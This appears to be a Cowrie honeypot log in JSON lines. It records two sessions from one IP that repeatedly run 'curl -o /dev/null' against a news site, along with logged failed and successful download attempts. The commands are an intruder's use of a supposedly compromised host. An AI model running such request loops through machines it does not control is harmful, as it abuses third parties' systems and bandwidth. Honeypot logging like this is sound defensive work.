{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.902181Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.903002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.940260Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.941618Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.944153Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.945259Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.976560Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.982278Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.983381Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.988153Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.989072Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.001751Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.025419Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.026644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.031640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.032574Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.040373Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.067144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.068184Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.076128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.076999Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.096815Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.107156Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.108259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.114486Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.115395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.129996Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.142511Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.143723Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.145673Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.167452Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.168653Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.180478Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.182811Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.198193Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.227571Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.229458Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.276388Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.332311Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.333497Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.340461Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.359652Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.360780Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.372079Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.381329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.383002Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.389218Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.409605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.410797Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.412930Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.422212Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.423226Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.539406Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.544024Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.544974Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.552088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.553077Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.589122Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.606922Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.608102Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.614142Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.615184Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.678069Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.679672Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.684746Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.686022Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.743066Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.744321Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.747128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.748784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.799765Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.800983Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.803801Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.804860Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.827102Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.828765Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.855540Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.856723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.859392Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.860244Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.890542Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.917810Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.919030Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:05.922136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.923019Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.950891Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:05.953532Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.014829Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.016910Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.025285Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.026614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.029682Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.031324Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.062301Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.076952Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.078999Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.125784Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.127847Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.132614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.133568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.135472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.136582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.173915Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.175981Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.220729Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.222883Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.253519Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.268351Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.280405Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.284780Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.307236Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.327924Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.328968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.331015Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.333535Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.334230Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.348890Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.397079Z","src_ip":"212.227.125.160","session":"7541ed730449"}
